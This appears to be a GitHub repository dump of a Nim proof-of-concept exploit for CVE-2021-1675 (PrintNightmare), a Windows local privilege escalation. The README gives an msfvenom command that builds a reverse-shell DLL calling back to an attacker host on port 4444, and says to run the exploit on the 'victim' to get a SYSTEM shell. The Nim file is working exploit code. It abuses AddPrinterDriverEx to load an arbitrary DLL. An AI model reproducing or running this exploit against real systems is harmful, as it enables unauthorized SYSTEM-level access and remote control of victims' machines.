├── img.png
├── make.ps1
├── README.md
└── nimnightmare.nim


/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eversinc33/NimNightmare/HEAD/img.png


--------------------------------------------------------------------------------
/make.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/eversinc33/NimNightmare/HEAD/make.ps1


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2021-1675 LPE PoC
 2 | 
 3 | not my exploit! just wanted to play around with the `winim` library in nim.
 4 | 
 5 | ### Usage
 6 | 
 7 | Generate DLL payload with `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.237 LPORT=4444 -f dll > msfvenom.dll`, then start the handler on your attacker.
 8 | 
 9 | On the victim run `.\nimnightmare.exe <ABSOLUTE_PATH_TO_DLL>` and get a shell as SYSTEM.
10 | 
11 | ![](./img.png)


--------------------------------------------------------------------------------
/nimnightmare.nim:
--------------------------------------------------------------------------------
 1 | import winim
 2 | import strformat
 3 | import os
 4 | import bitops
 5 | 
 6 | if paramCount() != 1:
 7 |     echo "usage: nightmare.exe <C:\\ABSPATH\\TO\\DLL>"
 8 | 
 9 | var
10 |     dll_path = paramStr(1)
11 |     info: DRIVER_INFO_2
12 |     pcbNeeded: DWORD
13 |     numDriversExist: DWORD
14 | 
15 | # get required bytes for driver info in pcbNeeded
16 | EnumPrinterDrivers(NULL, "Windows x64", 2, NULL, 0, `&`pcbNeeded, `&`numDriversExist)
17 | 
18 | # allocate buffer for driver info
19 | var pDriverInfo = create(BYTE, pcbNeeded)
20 | 
21 | # save driver info into pDriverInfo
22 | let status = EnumPrinterDrivers(NULL, "Windows x64", 2, pDriverInfo, pcbNeeded, `&`pcbNeeded, `&`numDriversExist)
23 | 
24 | if status != 1:
25 |     echo "[!] Could not find current printer drivers"
26 |     quit(1)
27 | 
28 | var driverInfo = cast[ptr DRIVER_INFO_2](pDriverInfo)
29 | 
30 | echo fmt"[*] using DriverPath: {driverInfo.pDriverPath}"
31 | 
32 | info.cVersion = 3
33 | info.pConfigFile = dll_path
34 | info.pDataFile = dll_path
35 | # for winsrv2008 the driverpath is C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_neutral_4616c3de1949be6d\\Amd64\\UNIDRV.DLL
36 | info.pDriverPath = driverInfo.pDriverPath
37 | info.pEnvironment = "Windows x64"
38 | info.pName = T"NimDriver"
39 | 
40 | echo "[*] Load DLL to driver path..."
41 | let success = AddPrinterDriverEx(NULL, 2, cast[PBYTE](`&`info), bitor(APD_COPY_ALL_FILES, 0x10, 0x8000))
42 | 
43 | if success == ERROR_PRINTER_DRIVER_BLOCKED:
44 |     echo ":/"
45 | else:
46 |     echo ":)"


--------------------------------------------------------------------------------